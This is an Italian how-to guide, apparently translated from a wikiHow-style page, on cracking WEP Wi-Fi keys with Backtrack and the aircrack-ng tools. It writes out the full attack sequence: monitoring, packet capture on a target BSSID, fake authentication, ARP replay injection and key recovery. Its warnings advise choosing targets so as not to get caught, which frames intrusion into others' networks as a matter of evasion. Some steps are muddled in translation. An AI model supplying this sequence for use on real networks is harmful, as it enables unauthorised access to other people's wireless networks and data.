Rompere qualsiasi codifica o codice di crittografia implica conoscere alcune cose. Innanzitutto, devi sapere che esiste uno schema di crittografia. In secondo luogo, devi sapere come funziona la crittografia. Rompere qualsiasi codice manualmente è quasi impossibile; fortunatamente, puoi violare la crittografia WEP se usi un programma di sniffing dei pacchetti.
Passi
Passaggio 1. Usa Linux
Windows non può rilevare i pacchetti WEP, ma puoi usare un CD avviabile di Linux.
Passaggio 2. Procurati un programma per l'analisi dei pacchetti
Backtrack è un'opzione comunemente usata. Scarica l'immagine ISO e masterizzala su un CD/DVD avviabile.
Passaggio 3. Avvia Linux e torna indietro
Usa i tuoi CD/DVD avviabili.
Si noti che non è necessario installare questo sistema operativo sul disco rigido. Ciò significa che ogni volta che chiudi Backtrack, tutti i tuoi dati andranno persi
Passaggio 4. Selezionare un'opzione di avvio
La seguente schermata Backtrack verrà visualizzata dopo l'avvio. Modificare l'opzione con i tasti freccia su e giù e selezionarne uno. Questo tutorial utilizzerà la prima opzione.
Passaggio 5. Caricare l'interfaccia grafica tramite la base dei comandi
In questa opzione, Backtrack viene avviato sulla base dei comandi. Digita il comando: startx per continuare.
Passaggio 6. Fare clic sul pulsante del terminale in basso a sinistra
Sarà la quinta opzione.
Passaggio 7. Attendi l'apertura del terminale di comando di Linux
Passaggio 8. Visualizza il tipo di WLAN
Immettere il seguente comando: "airmon-ng" (senza virgolette). Dovresti vedere qualcosa come wlan0 sotto Interface.
Passaggio 9. Ottieni tutte le informazioni richieste per il punto di accesso
Immettere il seguente comando: "airodump-ng wlan0" (senza virgolette). Dovresti ottenere tre cose:
- BSSID
- Canale
- ESSID (nome AP)
-
Ecco cosa è emerso dal caso tutorial:
- BSSID 00:17:3F:76:36:6E
- Canale numero 1
- ESSID(Nome AP)Suleman
Passaggio 10. Immettere il seguente comando
Questo utilizzerà le informazioni di esempio sopra, ma dovresti collegarti da solo. Comando: "airodump-ng -w wep -c 1 -- bssid 00:17:3F:76:36:6E wlan0" (senza virgolette).
Passaggio 11. Consentire l'avvio dell'installazione
Passaggio 12. Aprire una nuova finestra di terminale
Digita il seguente comando, sostituendo i valori per il tuo BSSID, Canale ed ESSID. Comando: "aireplay-ng -1 0 –a 00:17:3f:76:36:6E wlan0" (senza virgolette).
Passaggio 13. Aprire un'altra nuova finestra di terminale
Digita il seguente comando: "aireplay-ng -3 –b 00:17:3f:76:36:6e wlan0" (senza virgolette).
Passaggio 14. Consentire l'avvio dell'installazione
Passaggio 15. Torna alla prima finestra del terminale
Passaggio 16. Consenti ai dati in questa finestra di raggiungere 30000 o più
Ci vorranno dai 15 ai 60 minuti (o più) a seconda del segnale wireless, dell'hardware e del carico sul punto di accesso.
Passaggio 17. Vai alla terza finestra del terminale e premi Ctrl + c
Passaggio 18. Apri le directory
Digita il seguente comando: "dir" (senza virgolette). Questo mostrerà le directory salvate su di esso durante la decrittazione.
Passaggio 19. Utilizzare un file cap
Per l'esempio, sarebbe il seguente: "aircrack-ng web-02.cap" (senza virgolette). Verrà avviata la configurazione mostrata di seguito.
Passaggio 20. Rompi la chiave crittografata WEP
Al termine di questa configurazione, sarai in grado di rompere la chiave. In questo esempio, era {ADA2D18D2E}.
Suggerimenti
- Le leggi in materia di sicurezza della rete possono variare da luogo a luogo. Assicurati di sapere tutto ciò che ti serve sapere e preparati ad affrontare le conseguenze delle tue azioni mentre ci provi.
- Se ricevi un errore che dice che la tua attuale scheda di rete è occupata, prova il comando "airmon-ng wlan0" (senza virgolette) e poi ripeti i comandi in questa guida usando mon0 al posto di wlan0 ogni volta.
- Probabilmente sarai in grado di trovare versioni già compilate della maggior parte dei programmi di cui avrai bisogno.
- Molti programmi di sniffing come Wireshark (precedentemente noto come Ethereal), così come Airsnort e Kismet, sono disponibili come codice sorgente. Avrai bisogno di un po' di esperienza nella compilazione del codice sorgente per Linux o Windows per usare Airsnort o Kismet. Wireshark/Ethereal viene fornito con un programma di installazione oppure puoi scaricare il codice sorgente.
- Backtrack linux è ora rinominato e distribuito come Kali linux. Può essere scaricato dalla homepage di Kali Linux
Avvertenze
- Hai bisogno di una scheda wifi specifica che sia compatibile con i programmi che stai utilizzando
- Fai sempre attenzione a chi è il tuo obiettivo. Non è intelligente entrare nel tuo McDonalds locale e cercare di romperne la rete. Le probabilità di essere scoperti aumentano di dieci volte.
- Queste informazioni devono essere utilizzate in modo etico. L'uso improprio di queste informazioni può essere illegale sia a livello locale che federale.